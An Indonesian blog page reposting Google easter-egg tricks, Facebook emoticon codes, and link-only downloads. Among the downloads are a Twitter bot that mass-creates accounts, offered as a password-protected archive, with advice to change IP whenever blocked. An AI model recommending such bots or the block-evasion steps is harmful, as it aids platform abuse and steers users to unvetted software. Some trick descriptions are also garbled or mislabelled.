Ingin merasakan seperti apa rasanya terbang dengan jet tempur sembari mencari sesuatu di internet? Ketik ‘do a barrel roll’ pada bar pencarian Google dan saksikan seluruh laman akan berjumpalitan. Lihat di sini

2. Tilt
Lakukan pencarian di google dengan kata kunci "tilt". Maka google akan menjadi sedikit miring. Lihat di sini.

3. Google Sphere
tulis "google sphere" dan klik “I’m Feeling Lucky”maka anda akan melihat google seperti awan (cloud). Lihat di sini.

4. What Is The Loneliest Number?
Jangan takut menanyakan pertanyaan sulit pada Google. Ketik query ‘What is the loneliest number’ dan Google akan menjawab ‘1’. Kalkulator akan memberi jawaban sama saat Anda mengetik query ‘the answer to life, the universe, and everything’ dan ‘the number of horns on a unicorn’. Lihat di sini.

5. Askew
Saat mengetik query ini, Google akan mejadi sedikit mabuk. Lihat di sini.

6. Google Gravity
Lelah dengan Google yang tak memiliki berat? Masuk ke Google Earth dan masuki ‘Google gravity’ dan klik ‘I’m feeling lucky’. Saat bar pencarian, tombol dan logo jatuh ke bawah laman, Anda bisa melempar-lemparkannya di sekitar laman cukup dengan mengklik, drag dan melepasnya. Lihat di sini.

7. Google pacman
Tulis "google pacman" dan klik “I’m Feeling Lucky”, anda bisa bermain pacman. Lihat di sini.

8. Recursion
Anda tahu saat masuk kamar mandi dengan banyak cermin dan saat berbalik, melihat pantulan diri seolah tak terbatas? Ini disebut recursion. Menurut Merriam-Webster, kata ini berarti ‘prosedur yang bisa diulang-ulang’. Pada Google, saat Anda mencari kata ini, Anda akan dibawa kembali dan kembali ke laman baru di mana hal ini seolah tak ada hentinya. Lihat di sini.

9. Zerg Rush
Masukkan kata 'Zerg Rush' dalam kotak pencarian Google, lalu klik search. Lihat di sini.

10. Where Is Chuck Norris?
Google akan memberi Anda laman kosong saat Anda mengklik “I’m Feeling Lucky” untuk mencari query tersebut. Pengguna akan diarahkan pada laman www.NoChuckNorris.com yang menampilkan teks dengan tulisan ‘Google tak akan mencarikan Chuck Norris karena Google tahu Anda tak mencari Chuck Norris, ia yang mencari Anda’. Laman ini juga memberi pengguna pilihan untuk mencari ‘laman dari jenggot Chuck’. Lihat di sini.

11. Once In A Blue Moon
Google Calculator juga mengembalikan pertanyaan sulit Anda. Ketik query ‘baker’s dozen’ dan kalkulator Google akan mengembalikannya dengan ‘13’ (lihat di sini). Mencari ‘once in a blue moon’ akan memberi Anda sejumlah angka komik kecil. Lihat di sini.

12. Googoth
Isikan kata “googoth” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Temen2 akan segera dibawa masuk ke tampilan google yang gelap dan terkesan gothic. Lihat di sini.


13. Epic Google
Isikan kata “epic google” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Lihat di sini.

14. Rainbow Google
Isikan kata “rainbow google” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Lihat di sini.

15. Google Loco
Isikan kata “google loco” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Lihat di sini.

16. Google Gothic
Isikan kata “google loco” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Lihat di sini.


17. Google for Hacker
Isikan kata “google for hacker” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Lihat di sini.

18. xx-klingon
Isikan kata “xx-klingon” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Temen2 akansegera dibawa masuk ke tampilan google dengan bahasa suku Klingon. Lihat di sini.

19. ewmew fudd
Isikan kata “ewmew fudd” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Temen2 akansegera dibawa masuk ke tampilan google dengan teks versi tokoh Elmer Fudd dari Warner Bros. Lihat di sini.


20. Google bsd
Isikan kata “google bsd” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Coba perhatikan ikon google yang biasa menjadi ikon bsd.

21. Google linux
Isikan kata “google linux” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Coba perhatikan ikon google yang biasa menjadi ikon linux.

22. google pirates
Isikan kata “google pirates” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Lihat di sini.

23. Bermain ‘Snake’ di video YouTube
Jika Anda sedang menonton video di YouTube, tekan tombol bawah saat sedang buffer untuk menikmati game ‘snake’ di video. Trik ini tidak bekerja untuk video yang memiliki anotasi atau iklan.

Sumber : http://www.sektim.com/2012/02/22-kumpulan-rahasia-pencarian-google.html

Internetan Puas tanpa Modem ( HOT ) 2013

Mau tau caranya kan Internetan Tanpa Modem ??

Nah disini Reza Pasti ajarin bagaimana caranya

Langsung aja Sedot DISINI

THANKZ

tag:
Internet tanpa modem
internet puas
internet gratis
internetan cuma cuma alias gratis

Facebook Chat Emoticons Terbaru 2013

Facebook Chat Emoticons Terbaru 2013

BlogKepo - Hallo kawan semua ... ngga terasa udah tahun 2013 ajah yah, nah karena Tahun Baru kali ini saya Muhammad Reza Rizaldi akan coba berbagi Trik seputar Facebook , khususnya seputar Emo Chat Fb gan ....

cara penggunaanya mudah kok, cukup Copy-Paste Kode Emoticons nya ke dalam Chat atau Pesan Facebook Teman Anda ....

Contoh :

Nih yang Paling fenomenal yaitu Gangham Style

Silakan Copas Semua Kode di bawah ini ke dalam Pesan FB Teman Anda tanpa Terkecuali ...
[[490550790968952]] [[490550800968951]] [[490550807635617]]
[[490550820968949]] [[490550837635614]] [[490550847635613]]
[[490550857635612]] [[490550867635611]] [[490550877635610]]
[[490550884302276]] [[490550894302275]] [[490550900968941]]
[[490550914302273]] [[490550924302272]] [[490550937635604]]
[[490550947635603]] [[490550954302269]] [[490550967635601]]
Dan ini juga beberapa Chat Emoticons Keren lainnya ....

http://seo-kepo.blogspot.com/2013/01/facebook-chat-emoticons-terbaru-2013.html
dan ini adalah kode kodenya ...
[[334954663181745]] = Spongebob
[[100001755689032]] = Squirtle
[[148935948523684]] = Pedobear
[[120219704713360]] = Sonic
[[123363421035031]] = Pooh
[[132045620187428]] = Piglet
[[147290738648754]] = Ultraman
[[40134995667]]         = Ichigo
[[100001076048283]] = shin-chan
[[196431117116365]] = Shin chan 2
[[250128751720149]] = domo
[[326134990738733]] = Pikachu
[[155393057897143]] = Doraemon
[[224502284290679]] = Nobita

dah Cukup sampai disini ajah Tips dan Trik kali ini ....
Silakan Bookmarks Blog ini untuk mengetahui perkembangan Terbaru yah ....

Follow us: @Reza_Dihati1 on Twitter | Rezza on Facebook

Trik Google Ajib

Trik Google

trik google, google trik, trick, seo, seo-kepo, terbaru, download mp3, download lagu


BlogReza - Hallo sahabat kepo kali ini saya akan coba berbagi trik jadul google ......
tapi biar jadul tetap bisa jadi hiburan disaat stress koq :)
oya sebelum mencoba trik ini, setelan pengaturan instannya di nonaktifkan dulu yah ...

jika ga tau nih ada contoh gambarnya kok ...
setelah semua diatur, mari saatnya kita bersenang - senang :)

BUKA GOOGLE 

1> Ketik "Gravity Google" dan klik pada "Saya Merasa Beruntung" (tunggu sebentar untuk mengalami efek gravitasi.)

2> Ketik "elgoog" dan klik pada "Saya Merasa Beruntung" (efek Cermin aktif.)

3> Ketik "Sphere Google" dan klik pada "Saya Merasa Beruntung" (melihat efek berputar.

4> Ketik "yang lucu" dan klik pada "Saya Merasa Beruntung" (lihat yang begitu lucu dan cantik / ganteng.)

5> Ketik "Google Loco" dan klik pada "Saya Merasa Beruntung" (lihat apa yang bergerak.)

6> Ketik "LOL Limewire" dan klik pada "Saya Merasa Beruntung" (melihat bahwa Anda sebagai seorang bajak laut.)

7> Ketik "Epic Google" dan klik pada "Saya Merasa Beruntung"

8> Ketik "Rainbow google" dan klik pada "Saya Merasa Beruntung"

9> Ketik "Google Annoying" dan klik pada "Saya Merasa Beruntung"

10> Ketik "Google pacman" dan klik pada "Saya Merasa Beruntung"

11> Ketik "Google Magic" dan klik pada "Saya Merasa Beruntung"

12> Ketik "Google color (Ex: pink, biru)" dan klik pada "Saya Merasa Beruntung"

13> Ketik "Halaman Jantung Google" dan klik pada "Saya Merasa Beruntung"

14> Ketik "kotak epik" klik "Saya Lagi Beruntung"

15> Ketik "snape seksi" klik "Saya Lagi Beruntung"

16> Ketik "Weenie google" klik "Saya Lagi Beruntung"

17> Ketik "Siapa Awesome" klik pada "Saya Merasa Beruntung" salah satu berani mencoba 2???
cukup sampai disini dulu yah, dan postingan blog ini akan terganggu dulu, karena banyak tugas kuliah dan mesti siap - siap untuk UTS ...

~~~SALAM BLOGGER~~~
SUMBER : http://seo-kepo.blogspot.com/2012/12/trik-google_1.html#ixzz2HkZtsnz8

Download Bot Software Auto Create Account+Password

Download Bot Software Auto Create Account Twitter + Jamu + Bahan

Ramainya bot bot keluar, khusus pengunjung setia dari blog ini akan saya share software bot auto create + jamu + bahan..

langsung ajah download disini http://tny.cz/33c2ffb9
Pass Rar :  -="{Th3_cyb37_ch70m3}"=-

Software not support win 8 :D
tested : Win Xp Sp3 lancar
silahkan block untuk melihat passwordnya :D
atau yang hanya ingin tahu cara penggunaannya..
instal jamunya dahulu.. [net framewok 4.0]
instal juga bahannya.. [ ada didalam rar ]
setelah terinstal buka BOTnya.. [ jangan banyak" ya gan ]
dan masukan berapa akun yang ingin dibuat..
tunggu saja beberapa saat,,
hasilnya ada di accounts.txt
jika ingin menggunakan proxy tinggal masukan proxy kedalam proxies.txt
tapi sangat disarankan jangan menggunakan proxy karna akan sangat lambat sekali..
gunakanlah bahan yang ada didalam untuk mengganti IP setiap kali IP di block :D
selamat menggunakan..
Tutorial video menyusul :D
Tutorial tidak akan keluar dikarenakan ini
dan ini
Mohon Kritik dan Saran Anda Pada Blog Ini

Sumber : http://rizky-charger.blogspot.com/2012/12/download-bot-software-auto-create.html#ixzz2GzcsREOG

IDS Twitter 2 sampai 3 januari 2013 FRESH

 IDS Twitter update 2 sampai 3 Desember Masih Fresh


mau dapet
nih dia linknya KLIK DISINI AJA


Password: anisareza

THANKZ YA

Aku berjanji akan tinggalkan komen
Hayoo udh janji
 

Popular Posts

Text